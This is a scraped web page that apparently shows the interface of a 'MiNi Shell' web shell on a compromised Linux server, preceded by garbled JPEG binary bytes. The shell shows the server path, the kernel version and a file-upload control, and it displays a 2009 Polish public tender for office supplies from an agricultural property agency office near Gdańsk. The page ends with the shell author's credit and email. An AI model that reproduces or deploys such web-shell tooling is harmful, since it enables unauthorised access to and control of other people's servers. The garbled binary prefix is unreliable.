JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/59766-N-2009.html

<p class="kh_header"><b>Pruszcz Gdański: DOSTAWA MATERIAŁÓW BIUROWYCH</b><br>
<b>Numer ogłoszenia: 59766 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Gdańsku , ul. Powstańców Warszawy 28, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 3004841, 3023817, faks 058 3004843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW BIUROWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: sukcesywna dostawa do Zamawiającego i jego jednostek organizacyjnych  materiałów biurowych szczegółowo określonych w załączniku nr 1 do SIWZ.

Przedmiot zamówienia podzielono na 6 zadań w następujący sposób:
Zadanie nr 1 - obejmuje dostawę materiałów biurowych szczegółowo opisanych w załączniku nr 1 do ANR OT i CSA w Pruszczu Gdańskim ul. Powstańców Warszawy  28,
Zadanie nr 2 obejmuje dostawę materiałów biurowych do ANR GNiAZ w Pruszczu Gdańskim ul. Wojska Polskiego 3, szczegółowo opisanych w załączniku nr  1
Zadanie nr 3 obejmuje dostawę materiałów biurowych do ANR GNiAZ w Malborku ul. Wołyńska 19, szczegółowo opisanych w Załączniku nr  1
Zadanie nr 4 obejmuje dostawę materiałów biurowych do ANR GNiAZ w Skarszewach, ul. Starogardzka 11, 83-250 Skarszewy, szczegółowo opisanych w załączniku nr  1
Zadanie nr 5 obejmuje dostawę materiałów biurowych do ANR GNiAZ w Słupsku, ul. 3-go Maja 44, 76-200 Słupsk, szczegółowo opisanych w załączniku nr  1
Zadanie nr 6 obejmuje dostawę materiałów biurowych do ANR GNiAZ w Bytowie, ul. Zakładowa 4, 77-100 Bytów, szczegółowo opisanych w załączniku nr  1.

Wykaz zadań częściowych wraz z przewidywaną ilością dostaw poszczególnych materiałów biurowych w czasie trwania umowy zawiera załącznik nr 1 Specyfikacji Istotnych Warunków Zamówienia. 
2. Zamawiający wymaga dostarczenia wraz z ofertą po jednej próbce następujących materiałów: 
Klej biurowy w tubie opisany w: zadaniu nr 1 tabela A- poz. 27, 
 Klej biurowy w sztyfcie opisany w: zadaniu nr 1 tabela B- poz. 18; zadaniu nr 2 - poz.22; zadaniu nr 3 - poz.15; zadaniu nr 4 - poz.12; 
Klej biurowy w sztyfcie opisany w zadaniu nr 5 - poz.24; zadaniu nr 6 - poz.19,
Korektor szybkoschnący w długopisie opisany w: zadaniu nr 1 tabela A- poz.37; zadaniu nr 3 - poz. 20; zadaniu nr 4 - poz. 44; zadaniu nr 5 -poz. 31; zadaniu nr 6 - poz.26,
 Korektor w taśmie opisany w: zadaniu nr 1 tabela A - poz. 38; zadaniu nr 3- poz.19; zadanie nr 4 - poz.17, 
Cienkopis opisany w: zadaniu nr 1 tabela A - poz. 5; zadaniu nr  2 - poz. 5; zadaniu nr 3 - poz. 5; zadaniu nr 4 - poz. 3; zadaniu nr 5 - poz. 2;
Marker do opisywania płyt opisany w: zadaniu nr 1 tabela A- poz. 40,
Marker permanentny opisany w: zadaniu  nr 1 tabela A - poz. 43; zadaniu nr 1 tabela B - poz. 22; zadaniu nr 2 - poz.31; zadaniu nr 3 - poz.26, zadaniu nr 6 - poz. 47,
Ołówek automatyczny opisany w: zadaniu nr 1 tabela A - poz. 45, tabela B - poz. 24,  zadaniu nr 4 - poz. nr 38; zadaniu nr 5 - poz. 33, 
Ołówek opisany w: zadaniu nr 1 tabela A - poz. 46; zadaniu nr 6 - poz. 30,
Ołówek opisany w zadaniu nr 1 tabela B - poz. 25; zadaniu nr 3 - poz. 27; 
Dziurkacz opisany w: zadaniu nr 1 tabela A- poz. 16, tabela B - poz. 11, zadaniu nr 2-poz. 16; zadaniu nr 3 - poz.11; zadaniu nr 4 - poz. 41;
Rozszywasz do wszystkich rodzajów zszywek opisany w: zadaniu nr 1 tabela A - poz. 51;  zadaniu nr 5 poz. 38
Zszywacz do zszywek opisany w: zadaniu nr 1 tabela A - poz. 68; babela B - poz. 43, zadaniu 2- poz.48;       zadaniu 3 - poz.48; zadaniu 4 - poz. 42; 
 
Próbki należy dostarczyć w zależności na które zadanie Wykonawca składa ofertę. W przypadku  składania ofert na kilka zadań, a dany artykuł powtarza się - próbkę należy złożyć w jednym egzemplarzu.
Próbki należy dostarczyć w  zamkniętym kartonie oznakowanym jako próbki do oferty na dostawę materiałów biurowych.
      
3. W trakcie realizacji umowy Wykonawca nie może dostarczyć wyrobów innego producenta niż wskazano w formularzu cenowym - załącznik nr 2a.

4. Dostarczone towary muszą być nowe, wolne od wad technicznych i prawnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2 Pzp.

Zamawiający uzna spełnienie warunków określonych w pkt 1, jeżeli Wykonawca wraz z ofertą dołączy dokumenty wykazane w pkt 2.2. 1  lit) a), b) części II specyfikacji.  
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana na podstawie załączonych dokumentów wg formuły spełnia- nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty załączone muszą być:
2.2.1   Oświadczenia i dokumenty w  celu potwierdzenia spełniania warunków udziału w postępowaniu:  
a)   Wypełniony i podpisany druk -Oświadczenie zgodne w treści z załącznikiem nr 3 do niniejszej specyfikacji istotnych warunków zamówienia,  
b) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.2.2   Ponadto do oferty muszą być dołączone następujące dokumenty:
a)   Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba że z treści pełnomocnictwa wynika co innego.
b)    Wykaz części przedmiotu zamówienia, której wykonanie Wykonawca powierzy podwykonawcom - zgodnie ze wzorem stanowiącym załącznik nr 4 do specyfikacji. 

Uwaga:     
W przypadku przystąpienia do postępowania Wykonawców określonych w części I pkt. 6.10, dokumenty wymienione w pkt 2.2.1 lit b) składa każdy z członków konsorcjum lub wspólników spółki cywilnej. Oświadczenie wymienione w pkt 2.2.1 lit. a) składa każdy z Wykonawców lub składają wspólnie.
2.3 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2.2.1.lit. b), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
2.4 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie powyższym, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
Uwaga:
Wszystkie dokumenty winny być złożone w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez osobę podpisująca ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Gdańsku z/s w Pruszczu Gdańskim, 83-000 Pruszcz Gdański  ul. Powstańców Warszawy 28, pokój 01.07A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 11:00, miejsce: Sekretariat Agencji Nieruchomości Rolnych Oddział Terenowy w Gdańsku z/s w Pruszczu Gdańskim, 83-000 Pruszcz Gdański  ul. Powstańców Warszawy 28.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje dostawę materiałów biurowych szczegółowo opisanych w załączniku nr 1 do ANR OT i CSA w Pruszczu Gdańskim ul. Powstańców Warszawy  28,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje dostawę materiałów biurowych do ANR GNiAZ w Pruszczu Gdańskim ul. Wojska Polskiego 3, szczegółowo opisanych w załączniku nr  1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje dostawę materiałów biurowych do ANR GNiAZ w Malborku ul. Wołyńska 19, szczegółowo opisanych w Załączniku nr  1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje dostawę materiałów biurowych do ANR GNiAZ w Skarszewach, ul. Starogardzka 11, 83-250 Skarszewy, szczegółowo opisanych w załączniku nr  1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje dostawę materiałów biurowych do ANR GNiAZ w Słupsku, ul. 3-go Maja 44, 76-200 Słupsk, szczegółowo opisanych w załączniku nr  1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje dostawę materiałów biurowych do ANR GNiAZ w Bytowie, ul. Zakładowa 4, 77-100 Bytów, szczegółowo opisanych w załączniku nr  1..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com